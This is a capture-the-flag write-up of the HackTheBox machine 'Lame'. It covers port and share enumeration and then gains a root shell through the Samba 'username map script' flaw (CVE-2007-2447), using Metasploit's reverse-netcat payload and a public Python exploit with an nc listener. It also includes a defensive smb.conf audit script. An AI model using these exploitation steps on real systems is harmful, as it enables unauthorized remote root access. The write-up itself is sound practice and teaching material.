
[HackTheBox] Lame WriteUp

Published 2023/03/02

Introduction

This is a writeup of Lame, a Linux machine. I didn't want to use Metasploit, but it looked so easy with it that I ended up using it anyway. I have also included the approach that doesn't use it.
https://app.hackthebox.com/machines/1

Steps

  • Port scan
  • Check FTP and Samba
  • Anonymous login
  • Check the files
  • Check versions and look for vulnerabilities
  • Metasploit or an exploit script
  • Get root (user flag, root flag)

Enumeration

Nmap port scan

nmap -sC -sV -Pn lame.htb
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-01 23:34 EST
Nmap scan report for lame.htb (10.129.219.210)
Host is up (0.19s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.39
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA)
|_  2048 5656240f211ddea72bae61b1243de8f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h30m24s, deviation: 3h32m11s, median: 21s
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2023-03-01T23:35:05-05:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.12 seconds

FTP: anonymous login
SAMBA: try logging in?

FTP port 21

login

ftp lame.htb
Connected to lame.htb.
220 (vsFTPd 2.3.4)
Name (lame.htb:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

There was nothing of interest.

SAMBA port 445

Crackmapexec

crackmapexec smb lame.htb
/usr/lib/python3/dist-packages/pywerview/requester.py:144: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if result['type'] is not 'searchResEntry':
SMB         lame.htb        445    LAME             [*] Unix (name:LAME) (domain:hackthebox.gr) (signing:False) (SMBv1:True)

SMBmap

smbmap -H lame.htb
[+] IP: lame.htb:445    Name: unknown                                           
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        tmp                                                     READ, WRITE     oh noes!
        opt                                                     NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$                                                  NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))

There are several shares, but it seems only tmp is accessible.
The service field shows the Samba version; is that a hint to run searchsploit?

tmp

smbclient //lame.htb/tmp
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar  2 00:06:33 2023
  ..                                 DR        0  Sat Oct 31 03:33:58 2020
  .ICE-unix                          DH        0  Wed Mar  1 23:25:04 2023
  vmware-root                        DR        0  Wed Mar  1 23:26:15 2023
  .X11-unix                          DH        0  Wed Mar  1 23:25:29 2023
  .X0-lock                           HR       11  Wed Mar  1 23:25:29 2023
  vqeu                                N        0  Thu Mar  2 00:04:31 2023
  5573.jsvc_up                        R        0  Wed Mar  1 23:26:15 2023
  vgauthsvclog.txt.0                  R     1600  Wed Mar  1 23:25:03 2023

                7282168 blocks of size 1024. 5385800 blocks available

Nothing of interest here either.

Searchsploit

searchsploit samba 3.0.20
----------------------------------------------------------------- ---------------------------------
 Exploit Title                                                   |  Path
----------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass           | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execut | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                            | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                    | linux_x86/dos/36741.py
----------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

16320.rb looks interesting.
It turns out that Samba 3.0.0 - 3.0.25rc3 has a remote code injection vulnerability.
https://www.exploit-db.com/exploits/16320
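As an added defender-side example (not from this writeup or from the exploit linked above): a small Python audit that parses an smb.conf, flags the 'username map script' directive that CVE-2007-2447 abuses when the Samba banner version falls in the affected 3.0.x range, and reports guest-writable shares like the tmp share seen in the smbmap output. The smb.conf text is a constructed sample, not the machine's real config.

```python
import re

# Constructed sample smb.conf (not the Lame machine's real config): it has the
# 'username map script' directive CVE-2007-2447 abuses and a guest-writable
# tmp share like the one smbmap showed above.
SAMPLE_SMB_CONF = """
[global]
    workgroup = WORKGROUP
    security = user
    username map script = /etc/samba/scripts/mapusers.sh
[tmp]
    path = /tmp
    writable = yes
    guest ok = yes
"""

def parse_smb_conf(text):
    """Return {section: {key: value}} from smb.conf text; names lowercased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":      # blank or comment line
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections

def samba_version(banner):
    """'3.0.20-Debian' -> (3, 0, 20); rc builds are coarsely treated as final."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", banner)
    return tuple(int(x) for x in m.groups()) if m else None

def audit_samba(conf_text, banner):
    """List findings: CVE-2007-2447 exposure and guest-writable shares."""
    conf, findings, ver = parse_smb_conf(conf_text), [], samba_version(banner)
    if "username map script" in conf.get("global", {}):
        if ver and (3, 0, 0) <= ver < (3, 0, 25):
            findings.append(f"CVE-2007-2447: 'username map script' is set on Samba "
                            f"{banner}; upgrade to 3.0.25 or later or drop the directive")
        else:
            findings.append("'username map script' is set; version outside the affected range")
    for share, opts in conf.items():
        guest = opts.get("guest ok", "no").lower() == "yes"
        if share != "global" and guest and opts.get("writable", "no").lower() == "yes":
            findings.append(f"share [{share}] is writable by anonymous guests")
    return findings
```

Run it against a host's real smb.conf and the version string from the nmap banner; an empty list means neither weakness was found.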

Foothold

Metasploit

msf6 > search samba 3.0.20

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script

msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) >

Set RHOSTS and LHOST and run it.

Root

msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 10.10.14.39:4444 
[*] Command shell session 2 opened (10.10.14.39:4444 -> 10.129.219.210:46488) at 2023-03-01 23:57:08 -0500

whoami
root

User flag

cd /home/makis
ls
user.txt

Root flag

cd /home/makis
ls
user.txt
cd /root
ls
Desktop
reset_logs.sh
root.txt
vnc.log

That's all for this one.

Without Metasploit

If you'd rather not use Metasploit, there is a Python script.

Python script

https://github.com/amriunix/CVE-2007-2447

pysmb is also required, so download it.
https://github.com/miketeo/pysmb/releases/tag/pysmb-1.2.9.1

With the folders arranged as shown below, I was able to run it.

Exploit

python3 usermap_script.py lame.htb 139 10.10.14.39 1234
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !
 nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.39] from (UNKNOWN) [10.129.219.210] 40796
whoami
root

Just like with Metasploit, it got me privileges right away.